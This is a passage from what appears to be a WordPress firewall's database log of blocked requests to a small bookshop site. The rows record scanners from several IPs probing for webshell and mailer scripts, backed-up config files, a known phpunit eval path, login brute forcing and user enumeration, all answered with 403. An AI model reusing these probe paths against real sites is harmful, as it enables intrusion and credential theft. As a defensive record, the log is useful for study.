Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','nzVM2j6gwGoXesNbRDLWPyHl',0,1638285143.3350,414,'','GET',403,0,700,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','YxBLqP98NDanGfU4crh1bsim',0,1638285166.0027,1353,'','GET',403,0,700,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','7E8wO6FeSZRtXkNmA1QxhfYU',0,1638285183.3986,422,'','GET',403,0,700,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/wp-admin/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','6NHrYqnj3iQCBALSRt048gkJ',0,1638285231.3512,434,'','GET',403,0,700,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/wp-content/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','hg5DHKlSkEdCxpiA76ztQj3M',0,1638285259.3907,412,'','GET',403,0,700,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/wp-includes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','BDlfJ2nicOUq9SZ63dxhTsIy',0,1638285275.9871,455,'','GET',403,0,700,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/wp-content/plugins/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','TF95Jsda3AVCBu460HoqztIE',0,1638285319.1163,388,'','GET',403,0,700,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/wp-includes/css/wp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','gIXecdHDbUF6l3SBWRP2qh9J',0,1638285335.1829,398,'','POST',403,0,700,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/wp-content/plugins/ubh/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','wRsqNdghrOPey3JBY79Fu5zE',0,1638285358.6906,418,'','GET',403,0,700,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/wp-includes/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','6TMuGBvxnha5UJH8EWVjk2pR',0,1638285371.7429,427,'','GET',403,0,700,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','kQgsN5cZAMwpn0bLqtF1afj7',0,1638285384.3226,413,'','GET',403,0,700,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/haders.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','A3KxMjIwkrlSHQG2tYmZPOLW',0,1638285406.2954,413,'','GET',403,0,700,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/wp-content/wp-old-index.php?action=login&pass=-1&submit=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','1k8B2J6ZbIy0gnKWPiYjducr',0,1638285441.7547,387,'','GET',403,0,700,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/legion.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','JLwT9PQUISXphs28OnDv3Gj5',0,1638285453.9039,1386,'','GET',403,0,700,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','c1A276l0Q9KdjWoOyV5R43Ym',0,1638285488.6010,724,'','GET',403,0,700,0,1,'',0),('67.205.12.218',1137511642,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','3zeyCNm52FZA0KujQ8rsWLoO',0,1638285494.7029,570,'','POST',403,0,600,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/wp-includes/lfx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','S3fysw4tVI0nviT2Lj7qpKQ1',0,1638285504.6419,420,'','GET',403,0,700,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/wp-includes/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Zdn0Vh24ifugCXFJlDaYpAwj',0,1638285526.9782,435,'','GET',403,0,700,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','TQ7NlzqUVLW0xOB1o3MRC4GH',0,1638285559.8020,406,'','GET',403,0,700,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','txvG4oC9nQcKSOm5p8VeaY2z',0,1638285577.0781,383,'','GET',403,0,700,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','dDNesRmJBKzS3wU7lEV6btr2',0,1638285603.1250,400,'','GET',403,0,700,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/wp-content/langar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','VZYsrvKxzGQ0ORngDS3klbEw',0,1638285651.7670,490,'','GET',403,0,700,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','pS75IiXuenFgYAal8WtPodGy',0,1638285664.9909,448,'','GET',403,0,700,0,1,'',0),('212.192.241.167',3569414567,'','https://ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','rywzAQl2V890CdkIgBtjuWme',0,1638285711.6887,404,'','GET',403,0,700,0,1,'',0),('152.228.140.7',2565114887,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','Fvwnac710oITr2L5EDbOWHXZ',0,1638286442.9996,764,'','POST',403,0,600,0,1,'',0),('178.128.5.109',2994734445,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','TngIPuyE7lei0ZFNXCdz3VAk',0,1638287590.3770,581,'','POST',403,0,600,0,1,'',0),('2.56.59.242',37239794,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/95.0.4638.69 Safari\\/537.36\"}','GHxzA645jNdLitZUnXbphvkE',0,1638287621.8255,166,'','GET',403,0,520,0,1,'',0),('34.75.201.58',575392058,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','vs2PaNA8yehDTXw4mjxMiHGE',0,1638289032.0424,720,'','POST',403,0,600,0,1,'',0),('161.35.94.99',2703449699,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','P3wNGzCAFZh2KiM85ElSLnrY',0,1638290328.0468,523,'','POST',403,0,600,0,1,'',0),('82.223.55.111',1390360431,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','gADyeS0C5LBlcaNr7vVGTxzi',0,1638292763.7521,511,'','POST',403,0,600,0,1,'',0),('204.12.198.242',3423389426,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','2BFcfHaipPjlT8WehCmqxJ4w',0,1638293445.6471,169,'','POST',403,0,600,0,1,'',0),('35.203.61.118',600522102,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.167 Safari\\/537.36\"}','fRI3TKMUX0PcwuDb6A5LhWmZ',0,1638293811.1894,1127,'','POST',403,0,600,0,1,'',0),('128.199.220.215',2160581847,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','PQcY8bR2WNghfOC3JlUp4679',0,1638295135.4134,439,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2225.0 Safari\\/537.36\"}','nU7RNHZydGFgi8kJAbOXPzLq',0,1638296576.8753,457,'','POST',403,0,600,0,1,'',0),('104.168.174.187',1755885243,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0 Safari\\/537.36\"}','3S47AkaFDXYhe9nvw5K0rmWz',0,1638302237.7131,887,'','GET',403,0,520,0,1,'',0),('104.168.174.187',1755885243,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0 Safari\\/537.36\"}','b5Xo13th0Fq7KwIncPAvRuHU',0,1638302255.6190,382,'','GET',403,0,520,0,1,'',0),('204.12.198.242',3423389426,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.143 Safari\\/537.36\"}','Rr5Uc3fqhwCmkYDeAyKSXNox',0,1638303389.3674,2145,'','POST',403,0,600,0,1,'',0),('23.228.109.147',400846227,'','https://ashbooks.co.uk/libs/open-flash-chart/php-ofc-library/ofc_upload_image.php','','{\"1\":\"ALittle Client\"}','0eRF954KkUoDMHCinZgm1rY3',0,1638319832.9485,415,'','GET',403,0,700,0,1,'',0),('204.12.198.242',3423389426,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','iSlnwJGq5fWuAer8Z34hDNdM',0,1638323029.7014,170,'','POST',403,0,600,0,1,'',0),('69.30.225.178',1159651762,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','onSI057q2WM94vNf1y6HQVgP',0,1638328015.1206,493,'','POST',403,0,600,0,1,'',0),('157.245.156.140',2650119308,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','hUy0tsuSHmewxQY6fnvO1jbp',0,1638331705.1910,474,'','GET',403,0,520,0,1,'',0),('185.191.34.215',3116311255,'','https://ashbooks.co.uk/assets/images/wp_wrong_datlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','wrs1yVLMYdXEgKoeOtiBb4Rh',0,1638337244.4978,143,'','POST',403,0,700,0,1,'',0),('212.192.241.6',3569414406,'','https://ashbooks.co.uk/1index.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','PjgmiIZldpt7296QvRDey08u',0,1638345109.6951,386,'','GET',403,0,700,0,1,'',0),('212.192.241.6',3569414406,'','https://ashbooks.co.uk/1index.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','6KjTJfsSG097vX24DubFowVg',0,1638345177.1039,366,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','NsbMWK7mXI4Yar60F2pgiSnh',0,1638348329.1363,391,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','b6ktPHO2VJ7pCeqAx5m4nNf8',0,1638348342.6345,379,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/srx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Hvz2i4O3s6Enq05GtULxIybR',0,1638348347.4852,404,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/1337.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','qLg0s1BZNUtWMX7nOHG5SauF',0,1638348348.6738,390,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/xx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','iUK7M1hbcpzAn6r2mwROFJj0',0,1638348349.8681,354,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/XxX.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','jatM0if6BKsleY49Hb2uWFGd',0,1638348350.8947,173,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','pZBQPbXam9Sfx5O3rqdjntse',0,1638348352.6692,374,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','2wI0X6KCZqRAO9QzGYuLrNM4',0,1638348353.9155,379,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/bb.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','pCd5xgYNBt84FmEJQkHZwXvL',0,1638348355.9123,403,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Ugm2dcSpTDNnh4vksjtH1w5R',0,1638348357.3691,176,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','cBxdWK2ulQYorVq9R1aUi7n4',0,1638348359.4178,125,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','NtPmFczpWZMTwXQxLUKJobR6',0,1638348362.1783,382,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','gtQZoO9FnzNeMjW057BT4r16',0,1638348363.1698,358,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/c.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','BVjrYcZtxmh2K4GEfMQL39Pe',0,1638348365.6406,362,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/b.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','xBY76heqWQMgHIryCXAtREKz',0,1638348367.6956,442,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/f.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Jr3kXg9EBsfTOHlbF2tYjeDq',0,1638348369.3665,397,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','CP8YVLKIv9qRStb4o56Ayn2X',0,1638348373.4115,145,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/2.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','AgH9K5Edro1aSUlh4JRpWXNm',0,1638348374.4055,408,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','f5KcP4wOxhvWDdJ3SjVGM26q',0,1638348376.8712,386,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/new-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','mIBNlvo1d356qpOJjRnaiEZQ',0,1638348378.6525,339,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','gpU2uVoXI4q09xD136zPAS7Z',0,1638348381.4347,391,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','N32xX90sOWVmYwFH1z7CSLPU',0,1638348384.8669,353,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/doc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','lfDTgvwQNsIiMzC2a6motxky',0,1638348389.1820,363,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/alwso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','YBMJwqmaE1nkOZzC9b58FNSx',0,1638348390.3726,397,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/fa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','RyPteMHCvfkXS8KhAEFs10L4',0,1638348393.9122,397,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/3.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','cZbYBOlHCp0QzsE7GriNXade',0,1638348396.1617,390,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/alexus-mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','S1DJ5tBzg0An3fjlchYGQ4xk',0,1638348398.9321,440,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/wp-content/includes/uploads/Va.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','nMqSBzR1mJvpYte0Q4wHyZCi',0,1638348401.1458,382,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/wp-content/uploads/readindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','IWsSQbCNeRjZpVKPLJ3gwxrk',0,1638348403.1466,379,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/wp-content/uploads/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','N6RVJjv5wd23soyTChcqGeL4',0,1638348404.6477,355,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/wp-admin/includes/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','zqJWoLB1xG9MnOmwahbZR7t6',0,1638348405.9246,652,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/wp-admin/includes/readindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','2TO3sBu1o7lRVAm0LZPdhkQ5',0,1638348407.8903,403,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/wp-admin/includes/maint/wp-readindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Y02Jspca5BCdtlWyMbjP1onq',0,1638348408.8780,349,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/wp-admin/includes/maint/wp-cron.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','txskCeVTjbQgLNOJoiR8HZp7',0,1638348411.1713,383,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/wp-admin/includes/media-site.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 